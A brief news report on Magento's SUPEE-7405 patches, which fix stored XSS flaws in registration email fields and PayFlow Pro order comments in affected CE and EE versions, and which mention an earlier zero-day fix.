E-commerce content management provider Magento issued several patches to fix XSS vulnerabilities that could have injected a malicious JavaScript code into the company's online ordering form allowing the system to be taken over remotely.
The Magento products affected were Magento CE prior to 1.9.2.3, and Magento EE prior to 1.14.2.3. The company's updates, slugged SUPEE-7405, fixes 20 issues, two considered critical.
The first critical issue allows a user during registration to provide an email address containing JavaScript that is not properly validated by the Magento software. This could allow an administrator session to be hijacked or activated remotely. The second critical patch fixes an issue where a user could append comments to an order using a specially crafted request that relies on the company's PayFlow Pro payment module. This is also not properly filtered and can allow the JavaScript code to be saved in the database for later execution.
Of the remaining vulnerabilities four were rated as “high”, 10 as “medium” and four as “low”.
Magento noted that these vulnerabilities were not used in any known attacks.
Magento previously patched a zero-day vulnerability in October 2015 that could have been used by an attacker to access credentials and potentially gain complete control of the a user's Magento database.